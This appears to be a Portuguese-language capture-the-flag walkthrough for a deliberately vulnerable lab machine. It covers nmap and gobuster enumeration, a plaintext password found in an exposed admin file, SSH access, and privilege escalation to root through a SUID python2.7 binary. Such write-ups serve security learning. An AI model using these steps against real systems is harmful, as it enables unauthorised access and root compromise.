AdminNoobMachine
IP: 10.0.0.13
Enumeration
# nmap -sC -sV -v -Pn 10.0.0.13
..............................
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 ec:61:97:9f:4d:cb:75:99:59:d4:c1:c4:d4:3e:d9:dc (DSA)
| 2048 89:99:c4:54:9a:18:66:f7:cd:8e:ab:b6:aa:31:2e:c6 (RSA)
|_ 256 39:d9:79:26:60:3d:6c:a2:1e:8b:19:71:c0:e2:5e:5f (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Hacker Secutiry
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 34602/udp status
| 100024 1 36685/udp6 status
| 100024 1 51734/tcp status
|_ 100024 1 54568/tcp6 status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
# gobuster dir -e -u http://10.0.0.13 -w /usr/share/dirb/wordlists/big.txt
===============================================================
http://10.0.0.13/.htaccess (Status: 403) [Size: 293]
http://10.0.0.13/.htpasswd (Status: 403) [Size: 293]
http://10.0.0.13/LICENSE (Status: 200) [Size: 1093]
http://10.0.0.13/admin (Status: 301) [Size: 306] [--> http://10.0.0.13/admin/]
http://10.0.0.13/css (Status: 301) [Size: 304] [--> http://10.0.0.13/css/]
http://10.0.0.13/img (Status: 301) [Size: 304] [--> http://10.0.0.13/img/]
http://10.0.0.13/js (Status: 301) [Size: 303] [--> http://10.0.0.13/js/]
http://10.0.0.13/mail (Status: 301) [Size: 305] [--> http://10.0.0.13/mail/]
http://10.0.0.13/manual (Status: 301) [Size: 307] [--> http://10.0.0.13/manual/]
http://10.0.0.13/server-status (Status: 403) [Size: 297]
http://10.0.0.13/vendor (Status: 301) [Size: 307] [--> http://10.0.0.13/vendor/]
http://10.0.0.13/admin/temp.txt Anotacoes : Eu preciso trocar a minha senha hsecpwd123 , ja faz tempo que utilizo ela.
Exploração
hsec@noob1:~$ id
uid=1000(hsec) gid=1000(hsec) groups=1000(hsec)
hsec@noob1:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Debian
Description: Debian GNU/Linux 8.10 (jessie)
Release: 8.10
Codename: jessie
hsec@noob1:~$ uname -a
Linux noob1 3.16.0-4-586 #1 Debian 3.16.51-3 (2017-12-13) i686 GNU/Linux
Temos aqui uma Debian 8.10 om kernel 3.16.0
Pós Exploração
Vamos procurar "executáveis" que eventualmente possuam privilégios de root
hsec@noob1:/$ find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null
-rwsr-xr-x 1 root root 96760 Aug 13 2014 /sbin/mount.nfs
-rwsr-xr-x 1 root root 1085300 Feb 10 2018 /usr/sbin/exim4
-rwsr-xr-x 1 root root 78072 May 17 2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 38740 May 17 2017 /usr/bin/newgrp
-rwsrwxrwx 1 root root 3889608 Aug 13 2016 /usr/bin/python2.7
-rwsr-xr-x 1 root root 43576 May 17 2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 106908 Mar 23 2012 /usr/bin/mawk
-rwsr-xr-x 1 root root 52344 May 17 2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 53112 May 17 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 38868 May 17 2017 /bin/su
-rwsr-xr-x 1 root root 26344 Mar 29 2015 /bin/umount
-rwsr-xr-x 1 root root 34684 Mar 29 2015 /bin/mount
Repare que o python está habilitado para codar com root, então basta:
hsec@noob1:/$ python -c "import pty; pty.spawn(\"/bin/sh\")"
# id
uid=1000(hsec) gid=1000(hsec) euid=0(root) groups=1000(hsec)
Last updated